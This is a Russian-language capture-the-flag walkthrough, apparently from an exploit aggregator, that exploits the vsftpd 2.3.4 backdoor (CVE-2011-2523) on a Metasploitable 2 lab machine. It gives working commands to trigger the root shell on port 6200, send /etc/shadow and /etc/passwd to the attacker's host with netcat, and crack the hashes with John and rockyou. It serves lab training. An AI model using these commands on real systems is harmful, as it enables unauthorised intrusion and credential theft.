## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-XIANGSI-HOWARD-CTF---CVE-2011-2523
# Сценарий «Захват флага» - CVE-2011-2523
Захватите расшифрованный файл `/etc/shadow` и `/etc/passwd` с уязвимого сервера Metasploitable 2.
# Настройка окружения
## Шаг 1: Загрузите и распакуйте виртуальную машину
Для этого CTF мы используем VMware Workstation Pro с двумя виртуальными машинами. Kali Linux выступает в роли машины атакующего, а Metasploitable 2 — в роли уязвимой машины.
* Загрузите и установите VMware Workstation: https://www.vmware.com/products/workstation-player/workstation-player-evaluation.html
* Загрузите и извлеките виртуальную машину Kali Linux: https://www.kali.org/get-kali/
* Загрузите и извлеките виртуальную машину Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
## Шаг 2: Откройте виртуальные машины Kali Linux и Metasploitable 2 в VMware из извлечённого файла
* Выберите пункт `Open a Virtual Machine` в VMware Workstation и укажите распакованный файл Kali Linux
* Щёлкните правой кнопкой мыши по боковой панели и выберите пункт `open`, затем укажите распакованный файл Metasploitable 2
* Нажмите кнопку `Play virtual machine` на обеих виртуальных машинах
* Когда появится запрос выбрать вариант `I moved It` или `I copied It`, выберите `I copied It`
## Шаг 3: Вход
* Войдите в Kali Linux, используя `kali` в качестве имени пользователя и пароля
* Войдите в Metasploitable, используя `msfadmin` в качестве имени пользователя и пароля
## Шаг 4: Запишите IP-адрес виртуальной машины Metasploitable
* Выполните `ip addr show` и запишите IP-адрес из раздела `inet`
# Решение
Massachusetts Institute of Technology Research and Engineering описывает CVE-2011-2523 как распространённую уязвимость, при которой `vsftpd 2.3.4 downloaded between 20110630 and 20110703 contains a backdoor which opens a shell on port 6200/tcp`.
## Шаг 1: Найдите открытые порты на машине Metasploitable с помощью службы FTP
* `nmap <vulnerable-machine-ip-address>`
* сканирование nmap должно показать открытый порт 21, использующий службу ftp
## Шаг 2: Попробуйте подключиться к открытому порту с помощью NetCat
* `nc <vulnerable-machine-ip-address> 21`
* Имя пользователя — любая строка с `:)` на конце, введите `user <string>:)`
* Когда появится запрос пароля, введите любую строку `pass <string>`
* Затем завершите соединение с помощью ^C [CTRL + C] — на порту 6200 открывается оболочка с root-доступом к Metasploitable.
## Шаг 3: Подключитесь к оболочке на порту 6200 уязвимой машины
* ` nc -v <vulnerable-machine-ip-address> 6200`
* Покажите IP-адрес текущего соединения: `ip addr show`
* Покажите, что предоставлен root-доступ, с помощью `whoami`
## Шаг 4: Скопируйте файлы `/etc/shadow` и `/etc/passwd` в другой файл
* `cp /etc/shadow shadow.txt`
* `cp /etc/passwd passwd.txt`
## Шаг 5: Отправьте скопированные файлы на машину Kali Linux с помощью NetCat
* На машине атакующего найдите IP-адрес в разделе `inet` с помощью команды `ip addr show`
* Прослушивайте файлы на машине атакующего с помощью `nc -l -p 1234 > shadow.txt`
* В root-оболочке на Metasploitable выполните `nc -w 3 <destination-ip> 1234 < shadow.txt`
* Повторите для файла passwd
## Шаг 5: Преобразуйте файл shadow в формат инструмента `John`
* `unshadow passwd.txt shadow.txt > unshadowed-input`
* Просмотрите файл с помощью `cat unshadowed-input` — в нём должны храниться имя пользователя и пароль
## Шаг 6: Расшифруйте файл shadow с помощью команды `John` и словаря
* Используйте словарь `rockyou.txt` для взлома хэшей с помощью john
* Распакуйте файл словаря в Kali Linux: `sudo gzip -d /usr/share/wordlists/rockyou.txt.gz`
* Когда появится запрос пароля, используйте пароль администратора по умолчанию для Kali Linux — `kali`
* Взломайте хэши: `john unshadowed-input –wordlist=/usr/share/wordlists/rockyou.txt`
* Просмотрите взломанные пароли: `john –show unshadowed-input`